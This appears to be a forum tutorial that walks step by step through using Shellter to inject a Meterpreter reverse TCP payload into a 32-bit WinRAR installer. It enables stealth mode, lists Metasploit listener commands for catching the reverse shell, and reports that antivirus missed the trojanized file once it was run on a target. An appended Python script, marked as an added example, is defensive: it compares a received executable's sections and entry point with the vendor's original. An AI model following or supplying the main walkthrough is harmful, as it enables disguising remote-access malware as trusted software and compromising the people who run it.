Injecting Shellcode into Portable Executables

Post by Cyber Arch » Tue Apr 09, 2024 8:23 am

For installing and setting up the Shellter tool, read: viewtopic.php?f=46&t=14428

You can use the Shellter tool to inject a meterpreter payload shellcode into a portable executable. It's a piece of cake.

STEPS:
1. You need to download the target executable that you want to inject the meterpreter payload into. For this purpose, we are going to use the WinRAR installer executable as our portable executable.
You can download WinRAR from here: https://www.win-rar.com/predownload.html?&L=0&Version=32bit
(It's important that you download the 32-bit version of the WinRAR installer. The Shellter tool cannot perform payload injection on 64-bit portable executables, so make sure you get the 32-bit version.)

2. Launch the Shellter tool and get started.
When you launch Shellter, you are presented with a few different operation modes to choose from. For this example, we are going to use the Automatic mode. To select the Automatic mode, specify the "A" option.

3. Now you are prompted to specify the path to the PE target. In this case, we specify the path to the WinRAR executable that we downloaded earlier:

Code:

/home/kali/Downloads/wrar602.exe


4. After you have specified the path, Shellter starts the tracing process on the target PE.
Once the tracing process is complete, Shellter prompts you to specify whether you want to enable stealth mode. For this example, we are going to enable stealth mode.
To enable stealth mode, specify the "Y" option when prompted.

5. Shellter presents you with a payload selection menu. This is where you choose the payload you want to inject into the 32-bit WinRAR executable.
For this example, we are going to use the listed payloads. To select the listed payloads, specify the "L" option when prompted.

6. Now Shellter prompts you to specify the payload of your choice by index.
For this example, we are going to use the "Meterpreter_Reverse_TCP" stager method. To select this payload, choose option "1" when prompted.

7. Shellter prompts you to specify the payload options. You need to set the LHOST and LPORT options.

8. Now that you have set the LHOST and LPORT options for the Meterpreter Reverse TCP payload, Shellter starts the process of injecting the payload into the target PE. Once the injection process is complete, Shellter confirms it with a "Verified" message.

9. Now we need to set up the listener with Metasploit to receive a reverse TCP connection when the target executable is executed. You can do this by running the following commands in the Metasploit framework, one by one:

Code:

msfconsole
msf> use multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set LHOST <KALI-IP>
msf> set LPORT <PORT>
msf> run


10. After setting up the Metasploit listener, you need to transfer the target PE that we injected the payload into to the target system. Once the target PE is executed, we should get a meterpreter session on our listener.

The execution of the target PE on the target system was not detected by the AV, and as a result, we were able to obtain a meterpreter session on the target system.
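
Added example, not part of the original post: injection rewrites the executable, so a received installer can be compared with the vendor's original at the PE level (the same header parse also reports whether a file is 32-bit or 64-bit, as in step 1). The function names `parse_pe`, `compare_to_original` and `build_sample`, and the two sample buffers, are constructed for this illustration.

```python
import hashlib
import struct

MACHINE = {0x014C: "32-bit (x86)", 0x8664: "64-bit (x64)"}

def parse_pe(data):
    """Return (machine, entry_rva, {section: (sha256, flags)}) for a PE image."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0] if data[:2] == b"MZ" else -1
    if pe_off < 0 or data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    machine, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    entry_rva = struct.unpack_from("<I", data, pe_off + 24 + 16)[0]  # AddressOfEntryPoint
    sections, table = {}, pe_off + 24 + opt_size
    for i in range(nsect):  # each section header is 40 bytes
        name, _, _, raw_size, raw_ptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, table + 40 * i)
        digest = hashlib.sha256(data[raw_ptr:raw_ptr + raw_size]).hexdigest()
        sections[name.rstrip(b"\0").decode("ascii", "replace")] = (digest, flags)
    return MACHINE.get(machine, hex(machine)), entry_rva, sections

def compare_to_original(original, received):
    """List what differs between the vendor's file and a received copy."""
    if hashlib.sha256(original).digest() == hashlib.sha256(received).digest():
        return []
    findings = ["file hash differs from original"]
    _, entry_a, sect_a = parse_pe(original)
    _, entry_b, sect_b = parse_pe(received)
    if entry_a != entry_b:
        findings.append("entry point moved")
    for name in sorted(set(sect_a) | set(sect_b)):
        a, b = sect_a.get(name), sect_b.get(name)
        if a is None or b is None:
            findings.append(f"section {name}: added or removed")
        elif a != b:
            what = "content" if a[0] != b[0] else "flags"
            findings.append(f"section {name}: {what} changed")
    return findings

def build_sample(code, machine=0x014C):
    """Constructed PE-shaped buffer with one .text section (not a real installer)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 224, 0x0102)
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, len(code), 0, 0, 0x1000).ljust(224, b"\0")
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(code), 0x1000, len(code),
                       352, 0, 0, 0, 0, 0x60000020)  # raw data starts at byte 352
    return dos + b"PE\0\0" + coff + opt + sect + code

ORIGINAL = build_sample(b"A" * 32)              # constructed stand-in for the vendor file
MODIFIED = build_sample(b"A" * 16 + b"B" * 16)  # constructed copy with altered code bytes
print(compare_to_original(ORIGINAL, MODIFIED))
```

On real files, pass the bytes of the vendor's download and of the copy under inspection to `compare_to_original`.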
